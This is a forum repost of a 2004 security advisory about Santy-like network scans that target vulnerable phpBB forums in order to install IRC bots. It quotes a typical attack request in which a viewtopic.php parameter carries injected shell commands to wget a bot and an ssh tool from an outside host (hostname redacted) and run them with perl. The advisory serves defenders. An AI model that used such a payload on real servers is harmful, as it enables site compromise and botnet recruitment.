Submit Your Article

Forum Rules

Results 1 to 1 of 1

Thread: Santy-like activity

Thread Tools
- Show Printable Version
- Subscribe to this Thread…
Display
- Linear Mode
- Switch to Hybrid Mode
- Switch to Threaded Mode

12-25-2004, 04:31 AM #1
WPW_Feedbot

View Profile

View Forum Posts
Senior Member

Join Date

Dec 2004

Posts

11,004
Santy-like activity

Several phpBB administrators have reported to us that they are seeing lots of Santy-like activity.</p><p align="justify">Like mentioned before, Google is filtering the searches that the original Santy (and the variants that were created by corruption) were using.</p><p align="justify">But now we're seeing fairly large network scans that are trying to find vulnerable phpBB forums in order to install IRC bots on them.</p><p align="justify">Typical requests look like this:</p><p align="justify"><pre>
GET /phpBB2/viewtopic.php?t=533&rush=%65%63%68%6F%20%5F%53%54% 41%52%54%5F%3B%20cd%20/tmp;
wget%20hostnameremoved.org/pdf/bot;perl%20bot;wget%20hostnamemoved.org/pdf/ssh.a;...
</pre>

On 25/12/04 At 08:08 AM</p>

Read more...
Reply With Quote

Quick Navigation IT Discussion Forum Top

« Previous Thread | Next Thread »

Similar Threads

Anti-Santy Worm?

By minstrel in forum Internet Security Discussion Forum

Replies: 3
Last Post: 01-01-2005, 07:45 PM
Anti-Santy-Worm going around?

By WPW_Feedbot in forum IT Discussion Forum

Replies: 0
Last Post: 12-31-2004, 06:00 AM
Google stops Santy

By WPW_Feedbot in forum IT Discussion Forum

Replies: 0
Last Post: 12-22-2004, 03:01 PM
Wrapup on case Santy

By WPW_Feedbot in forum IT Discussion Forum

Replies: 0
Last Post: 12-22-2004, 02:31 AM
Google squashes Santy worm

By WPW_Feedbot in forum IT Discussion Forum

Replies: 0
Last Post: 12-21-2004, 09:31 PM

Posting Permissions

You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
[VIDEO] code is On
HTML code is Off

All times are GMT -4. The time now is 01:43 PM.